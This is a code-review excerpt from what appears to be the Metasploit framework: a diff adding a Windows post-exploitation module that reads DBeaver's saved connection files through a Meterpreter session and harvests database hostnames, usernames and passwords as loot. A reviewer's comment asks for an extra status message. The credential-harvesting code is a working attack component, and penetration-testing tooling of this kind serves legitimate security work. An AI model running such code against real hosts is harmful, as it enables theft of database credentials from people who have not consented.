modules/post/windows/gather/credentials/dbeaver.rb

```diff
@@ -0,0 +1,145 @@
+      'Columns' => [
+        'Name',
+        'Protocol',
+        'Hostname',
+        'Port',
+        'Username',
+        'Password',
+        'DB',
+        'URI',
+        'Type',
+      ]
+    )
+    all_result.each do |item|
+      item.each do |_key, value|
+        pw_tbl << value.values
+      end
+    end
+    if pw_tbl.rows.count > 0
+      path = store_loot('host.dbeaver', 'text/plain', session, pw_tbl, 'dbeaver.txt', 'Dbeaver Password')
+      print_good("Passwords stored in: #{path}")
+      print_good(pw_tbl.to_s)
+    end
+  end
+
+  def parse_json_dir(json_dir)
+    some_result = []
+    credentials_config = File.join(json_dir, 'credentials-config.json')
+    data_sources = File.join(json_dir, 'data-sources.json')
+    begin
+      if file_exist?(credentials_config) && file_exist?(data_sources)
+        credentials_config_data = read_file(credentials_config) || ''
+        data_sources_data = read_file(data_sources) || ''
+        fail_with(Failure::Unknown, 'The file could not be read') if data_sources_data.empty? || credentials_config_data.empty?
+        credentials_config_loot_path = store_loot('dbeaver.creds', 'text/json', session, credentials_config_data, credentials_config)
+        data_sources_loot_path = store_loot('dbeaver.creds', 'text/json', session, data_sources_data, data_sources)
+        print_good("dbeaver credentials-config.json saved to #{credentials_config_loot_path}")
+        print_good("dbeaver data-sources.json saved to #{data_sources_loot_path}")
+        some_result << parse_data_sources(data_sources_data, credentials_config_data)
+        print_status("Finished processing #{json_dir}")
+      end
+    rescue Rex::Post::Meterpreter::RequestError
+      fail_with(Failure::Unknown, "The file #{json_dir} either could not be read or does not exist")
+    end
+    return some_result
+  end
+
+  def parse_xml_file(fullpath)
+    some_result = []
+    begin
+      if file_exist?(fullpath)
+        file_data = read_file(fullpath) || ''
+        fail_with(Failure::Unknown, "The file #{fullpath} could not be read") if file_data.empty?
+        loot_path = store_loot('dbeaver.creds', 'text/xml', session, file_data, fullpath)
+        print_good("dbeaver .dbeaver-data-sources.xml saved to #{loot_path}")
+        some_result << parse_data_sources_xml(file_data)
+        print_status("Finished processing #{fullpath}")
+      end
+    rescue Rex::Post::Meterpreter::RequestError
+      fail_with(Failure::Unknown, "The file #{fullpath} either could not be read or does not exist")
+    end
+    return some_result
+  end
+
+  def run
+    profiles = grab_user_profiles
+    all_result = []
+    xml_path = ''
+    json_path = ''
+    if datastore['XML_FILE_PATH'].present?
+      xml_path = datastore['XML_FILE_PATH']
+      print_status("Looking for #{xml_path}")
+      all_result += parse_xml_file(xml_path)
+    end
+    if datastore['JSON_DIR_PATH'].present?
+      json_path = datastore['JSON_DIR_PATH']
```

Comment:
I think the same status message should also be added here. It helps to understand what's going on, specially when the provided paths are wrong.
```suggestion
      json_path = datastore['JSON_DIR_PATH']
      print_status("Looking for JSON files in #{json_path}")
```